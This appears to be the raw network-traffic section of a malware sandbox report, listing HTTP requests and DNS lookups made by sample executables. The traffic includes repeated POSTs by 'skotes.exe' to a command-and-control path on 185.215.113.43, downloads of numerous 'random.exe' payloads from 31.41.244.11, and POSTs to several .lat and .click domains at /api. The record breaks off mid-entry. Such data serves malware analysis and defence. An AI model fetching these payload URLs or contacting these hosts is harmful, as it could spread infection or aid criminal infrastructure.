                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:50 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:57 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:59 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:06 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:12 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:18 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:21 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:24 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:31 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:34 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:40 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:47 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:48:00 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:48:04 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        POST
                        http://185.215.113.43/Zu7JuNko/index.php
                        skotes.exe
                        Remote address:
                        185.215.113.43:80
                        Request
                        POST /Zu7JuNko/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.43
                        Content-Length: 31
                        Cache-Control: no-cache
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:48:10 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                      • flag-ru
                        GET
                        http://31.41.244.11/files/fate/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/fate/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:33 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 776832
                        Last-Modified: Tue, 17 Dec 2024 09:45:14 GMT
                        Connection: keep-alive
                        ETag: "6761482a-bda80"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://31.41.244.11/files/london/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/london/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:37 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 1885696
                        Last-Modified: Wed, 18 Dec 2024 18:20:46 GMT
                        Connection: keep-alive
                        ETag: "6763127e-1cc600"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://31.41.244.11/files/wicked/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/wicked/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:41 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 1114112
                        Last-Modified: Thu, 19 Dec 2024 03:43:46 GMT
                        Connection: keep-alive
                        ETag: "67639672-110000"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://31.41.244.11/files/geopoxid/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/geopoxid/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:45 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 1880576
                        Last-Modified: Wed, 18 Dec 2024 18:02:50 GMT
                        Connection: keep-alive
                        ETag: "67630e4a-1cb200"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://31.41.244.11/files/unique3/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/unique3/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:50 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 2013184
                        Last-Modified: Fri, 20 Dec 2024 04:32:27 GMT
                        Connection: keep-alive
                        ETag: "6764f35b-1eb800"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://31.41.244.11/files/lolz/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/lolz/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:57 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 21504
                        Last-Modified: Wed, 18 Dec 2024 18:13:28 GMT
                        Connection: keep-alive
                        ETag: "676310c8-5400"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://31.41.244.11/files/burpin1/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/burpin1/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:46:59 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 4438776
                        Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                        Connection: keep-alive
                        ETag: "675784f0-43baf8"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://31.41.244.11/files/unique1/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/unique1/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:06 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 4436480
                        Last-Modified: Fri, 20 Dec 2024 04:12:50 GMT
                        Connection: keep-alive
                        ETag: "6764eec2-43b200"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://31.41.244.11/files/martin/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/martin/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:12 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 4459008
                        Last-Modified: Fri, 20 Dec 2024 03:17:04 GMT
                        Connection: keep-alive
                        ETag: "6764e1b0-440a00"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://31.41.244.11/files/bckosq/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/bckosq/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:18 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 810496
                        Last-Modified: Thu, 19 Dec 2024 19:41:56 GMT
                        Connection: keep-alive
                        ETag: "67647704-c5e00"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://31.41.244.11/files/loadman/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/loadman/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:21 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 1374720
                        Last-Modified: Thu, 19 Dec 2024 17:14:58 GMT
                        Connection: keep-alive
                        ETag: "67645492-14fa00"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://31.41.244.11/files/x3team/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/x3team/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:24 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 3286016
                        Last-Modified: Wed, 18 Dec 2024 13:43:08 GMT
                        Connection: keep-alive
                        ETag: "6762d16c-322400"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://31.41.244.11/files/karl/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/karl/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:47:31 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 22016
                        Last-Modified: Thu, 19 Dec 2024 14:25:14 GMT
                        Connection: keep-alive
                        ETag: "67642cca-5600"
                        Accept-Ranges: bytes
                      • flag-ru
                        GET
                        http://31.41.244.11/files/unique2/random.exe
                        skotes.exe
                        Remote address:
                        31.41.244.11:80
                        Request
                        GET /files/unique2/random.exe HTTP/1.1
                        Host: 31.41.244.11
                        Response
                        HTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Fri, 20 Dec 2024 04:48:04 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 1945600
                        Last-Modified: Fri, 20 Dec 2024 04:36:55 GMT
                        Connection: keep-alive
                        ETag: "6764f467-1db000"
                        Accept-Ranges: bytes
                      • flag-us
                        DNS
                        pancakedipyps.click
                        823e4bdbcb.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        pancakedipyps.click
                        IN A
                        Response
                        pancakedipyps.click
                        IN A
                        172.67.209.202
                        pancakedipyps.click
                        IN A
                        104.21.23.76
                      • flag-us
                        POST
                        https://pancakedipyps.click/api
                        823e4bdbcb.exe
                        Remote address:
                        172.67.209.202:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: pancakedipyps.click
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:36 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=3ndmjlaig4tt7ln4jvcagnagl8; expires=Mon, 14 Apr 2025 22:33:15 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HKu84NZQ8IddDAPISAO%2BawBVoaHT4qXL3Suj3sEXfNPrPs04B3NYZUup6x%2FrauVoPYZk7rfb9KU9lzWFhWgM%2FVFVg8wglqD06C%2F6ao3eMc%2FoARcJizQZriP9VO4lIZ0rnnxYShoR"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd57ade7ef3c-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=61805&min_rtt=47350&rtt_var=38272&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2864&recv_bytes=587&delivery_rate=71416&cwnd=253&unsent_bytes=0&cid=a519ee574df899bb&ts=372&x=0"
                      • flag-us
                        DNS
                        grannyejh.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        grannyejh.lat
                        IN A
                        Response
                      • flag-us
                        DNS
                        discokeyus.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        discokeyus.lat
                        IN A
                        Response
                        discokeyus.lat
                        IN A
                        172.67.197.170
                        discokeyus.lat
                        IN A
                        104.21.21.99
                      • flag-us
                        POST
                        https://discokeyus.lat/api
                        823e4bdbcb.exe
                        Remote address:
                        172.67.197.170:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: discokeyus.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:39 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=lb8pt48vduh7229o74jn5qv40c; expires=Mon, 14 Apr 2025 22:33:18 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hbzEn8MLgQWBs3qK1SsEXjNQXPtxwGyBSjuEvYI94D7xqMzoWMnnaw%2FVo1hYtykV7VDvkgFWF6vxhqUMYY4fJ4mCx3Fk8JfmlJrpiJ4qiESGSVHQtBgt9AgGpY39f21DpQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd68ea5c63f1-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=50123&min_rtt=47275&rtt_var=13205&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=582&delivery_rate=78988&cwnd=253&unsent_bytes=0&cid=5c9e3fb8c1f653b8&ts=233&x=0"
                      • flag-us
                        DNS
                        necklacebudi.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        necklacebudi.lat
                        IN A
                        Response
                        necklacebudi.lat
                        IN A
                        172.67.215.121
                        necklacebudi.lat
                        IN A
                        104.21.50.254
                      • flag-us
                        POST
                        https://necklacebudi.lat/api
                        823e4bdbcb.exe
                        Remote address:
                        172.67.215.121:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: necklacebudi.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:40 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=vbe3hml21bm4k15tt4iarvjq2q; expires=Mon, 14 Apr 2025 22:33:19 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5mfmUI5Hw48FV5P4hcgUH42MEBdK6uzL3WjbpeSugqmvGh4sHXdfjOn8arXstPi4MsNnx7ewiP23940A8cVrtO9kS40BUH0FlyuxdAb0eoX1uwPzRhKWVFcrFKifVDjHUGZ4"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd6bcda671ed-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=53891&min_rtt=47442&rtt_var=13769&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2857&recv_bytes=584&delivery_rate=78085&cwnd=253&unsent_bytes=0&cid=526fb3ead9ec73aa&ts=274&x=0"
                      • flag-us
                        DNS
                        treehoneyi.click
                        fcc74b3f6b.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        treehoneyi.click
                        IN A
                        Response
                        treehoneyi.click
                        IN A
                        172.67.180.113
                        treehoneyi.click
                        IN A
                        104.21.91.209
                      • flag-us
                        DNS
                        treehoneyi.click
                        fcc74b3f6b.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        treehoneyi.click
                        IN A
                      • flag-us
                        DNS
                        energyaffai.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        energyaffai.lat
                        IN A
                        Response
                        energyaffai.lat
                        IN A
                        104.21.64.1
                        energyaffai.lat
                        IN A
                        104.21.96.1
                        energyaffai.lat
                        IN A
                        104.21.48.1
                        energyaffai.lat
                        IN A
                        104.21.80.1
                        energyaffai.lat
                        IN A
                        104.21.16.1
                        energyaffai.lat
                        IN A
                        104.21.112.1
                        energyaffai.lat
                        IN A
                        104.21.32.1
                      • flag-us
                        POST
                        https://energyaffai.lat/api
                        823e4bdbcb.exe
                        Remote address:
                        104.21.64.1:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: energyaffai.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:40 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=ft2lqnbtfp77lhq2joudn7glpj; expires=Mon, 14 Apr 2025 22:33:19 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YtjFAhCWJBI6RAhfH9gdpzRa7KDDyd%2FuIoac4KwkJ644U8Qs9FhISZ%2FH2ICXDri2DyWWdBBSrZUd5X3EkncCtXRqYRDEkIh3Ma6g0Ntl2CC4Wh9c%2BGqZjs59eA5kbFUHQwY%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd6eafcb9505-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=56350&min_rtt=47564&rtt_var=14289&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=583&delivery_rate=75295&cwnd=253&unsent_bytes=0&cid=8607058828aedcfe&ts=283&x=0"
                      • flag-us
                        DNS
                        aspecteirs.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        aspecteirs.lat
                        IN A
                        Response
                        aspecteirs.lat
                        IN A
                        172.67.157.253
                        aspecteirs.lat
                        IN A
                        104.21.66.85
                      • flag-us
                        POST
                        https://aspecteirs.lat/api
                        823e4bdbcb.exe
                        Remote address:
                        172.67.157.253:443
                        Request
                        POST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 8
                        Host: aspecteirs.lat
                        Response
                        HTTP/1.1 200 OK
                        Date: Fri, 20 Dec 2024 04:46:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Set-Cookie: PHPSESSID=t1jp3s3pmvnog0cb6r7n4a9kde; expires=Mon, 14 Apr 2025 22:33:19 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=au%2FJvJjk%2FKWlzlQSdZvHRQsfpy3%2BPUgPWTG33YioiONi7Bk938NPdB7GyzggdHBAPOjDGgjLOan8j6wOdVKwdHdAGh3Ns7uHgAQGy55%2FNjUDpL3ZpqHRmBinz9a8X5xZww%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8f4cfd715b856323-LHR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=50376&min_rtt=47425&rtt_var=13001&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=582&delivery_rate=75188&cwnd=245&unsent_bytes=0&cid=d5ca38a2a65498c8&ts=276&x=0"
                      • flag-us
                        DNS
                        sustainskelet.lat
                        dee2c68b58.exe
                        Remote address:
                        8.8.8.8:53
                        Request
                        sustainskelet.lat
                        IN A
                        Response
                        sustainskelet.lat
                        IN A
                        104.21.48.1
                        sustainskelet.lat
                        IN A
                        104.21.32.1
                        sustainskelet.lat
                        IN A
                        104.21.80.1
                        sustainskelet.lat
                        IN A
                        104.21.64.1
                        sustainskelet.lat
                        IN A
                        104.21.112.1
                        sustainskelet.lat
                        IN A
                        104.21.16.1
                        sustainskelet.lat
                        IN A
                        104.21.96.1
                      • flag-us
                        POST
